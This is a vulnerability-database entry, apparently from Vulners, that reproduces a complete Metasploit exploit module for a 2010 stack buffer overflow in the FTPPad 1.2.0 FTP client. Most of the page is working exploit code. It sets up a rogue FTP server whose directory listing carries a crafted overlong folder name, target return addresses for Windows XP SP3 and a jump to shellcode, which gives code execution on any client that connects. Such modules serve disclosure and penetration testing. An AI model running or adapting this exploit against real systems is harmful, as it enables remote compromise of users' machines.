FTPPad 1.2.0 Stack Buffer Overflow

🗓️ 12 Oct 2010 17:31:18Reported by corelanc0d3rType

This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client by triggering a buffer overflow when the client connects to a FTP server which sends an overly long directory and filename in response to a LIST command

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Exploit::Remote::FtpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FTPPad 1.2.0 Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is
        triggered when the client connects to a FTP server which sends an overly long directory
        and filename in response to a LIST command.

        This will cause an access violation, and will eventually overwrite the saved extended
        instruction pointer.  Payload can be found at EDX+5c and ESI+5c, so a little pivot/
        sniper was needed to make this one work.
      },
      'Author' 	 =>
        [
          'corelanc0d3r'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '68714' ],
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 3000,
          'BadChars' => "\x00\x0a\x2f\x5c\xff\x0c\x0d\x08\x09",
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          #shlwapi sniper + pivot :  MOV DWORD PTR DS:[EDX],EAX + CALL ESI
          [ 'XP SP3 Professional, English - shlwapi 6.00.2900.5912', { 'Ret' => 0x77FA6556 } ],
          [ 'XP SP3 Professional, German - shlwapi 6.00.2900.5912' , { 'Ret' => 0x77f86556 } ],
          [ 'XP SP3 Professional, English - shlwapi 6.00.2900.5512', { 'Ret' => 0x77FA6526 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-10-12',
      'DefaultTarget'  => 0))

  end

  def setup
    super
  end

  def on_client_unknown_command(c,cmd,arg)
    c.put("200 OK\r\n")
  end

  def on_client_command_list(c,arg)
    conn = establish_data_connection(c)
    if(not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end
    print_status(" - Data connection set up")
    code = 150
    c.put("#{code} Here comes the directory listing.\r\n")
    code = 226
    c.put("#{code} Directory send ok.\r\n")
    totalsize = 13000
    foldername = "A" * 24 + payload.encoded + ("A" * (3318-payload.encoded.length))
    #EDX+5c and ESI+5c point at shellcode
    #we control EAX and EIP
    #use value in EAX to write to EDX (to make a jump forward, about 5c bytes)
    #and then jump to ESI (which will then execute the jump forward, to payload)
    foldername << [target.ret].pack('V')  # MOV DWORD PTR DS:[EDX],EAX # ... # CALL ESI
    foldername << "\x41\x41\x75\x5B"  # EAX -> 75 5B = JNZ SHORT -> shellcode
    foldername << " " * (totalsize - foldername.length)
    print_status(" - Sending directory list via data connection")
    dirlist = "drwxrwxrwx    1 100      0         11111 Jun 11 21:10 #{foldername}\r\n"
    conn.put(dirlist + dirlist + dirlist + dirlist)
    conn.close
    return
  end
end

02 Oct 2020 20:00Current

7.3High risk

Vulners AI Score7.3